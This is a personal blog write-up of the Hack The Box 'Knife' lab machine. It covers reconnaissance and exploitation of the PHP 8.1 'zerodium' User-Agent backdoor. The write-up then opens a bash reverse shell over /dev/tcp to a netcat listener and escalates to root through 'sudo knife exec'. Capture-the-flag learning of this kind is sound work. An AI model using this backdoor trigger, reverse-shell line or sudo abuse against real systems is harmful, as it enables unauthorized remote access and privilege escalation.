Htb knifte

Adam Tilmar Jakobsen · June 10, 2021

#Linux #CTF #HTB

OS: Linux IP : Rank : Easy


echo " knifte.htb" >> /etc/hosts


Lets start firing up a nmap scan

nmap -sV -sC  -o nmapscan knife.htb

Not shown: 998 closed ports  
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)  
| ssh-hostkey:    
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)  
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)  
|\_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)  
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))  
| http-methods:    
|\_  Supported Methods: GET HEAD POST OPTIONS  
|\_http-server-header: Apache/2.4.41 (Ubuntu)  
|\_http-title:  Emergent Medical Idea  
Service Info: OS: Linux; CPE: cpe:/o:linux:linux\_kernel

We see a HTTP port is open, lets go to it.

![[Pasted image 20210523053510.png]]

A very simple HTTP page, nothing is clickable, lets try different file type. We can see it uses PHP, time to emulate the site for sub directory

gobuster dir -u https://knife.htb -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-small-words.txt -t 50 -k

Nothing of value here..

It time for the most powerful tool google lets google the Apache version for vulnabilities. Going to apache site we learn of two vulnabilities that have been fixed in version 2.4.42 Sorce One of them look interesting CVE-2020-1934 We learn that the website must have the mod_proxy_ftp mod on the website to be vulnerable. Nothing of value here.

Fire-up burp and lets see what the response look like from there.

![[Pasted image 20210523062802.png]]

we learn that is uses php/8.1, lets try google it for any information, after alot of googling I came across a post about a backdoor created by hacker by adding code to the source. source

We learn that we can send a request with User-agentt that start with zerodium it will then execute every php code after the code word.

![[Pasted image 20210523065714.png]]

Fire up a netcat listner

nc -lvnp 4444

As you can see we are able to execute code on the machine and get it to fire up a netcat to our machine. lets create a backdoor using netcat, insert your IP.

'bash -c "bash -i >& /dev/tcp/ 0>&1"'

And we got user access, let grap the flag

cat /home/james/user.txt

Privilege escalation

Running sudo -l we learn that we are allow to execute knife as admin, which a tool for manage chef instance.


By using knife exec we are allow to execute ruby scripts and it our case ruby code as root. lets create a small script which read the flag.

echo 'print"/root/root.txt")' > test.rb
sudo knife exec test.rb

And we got root.

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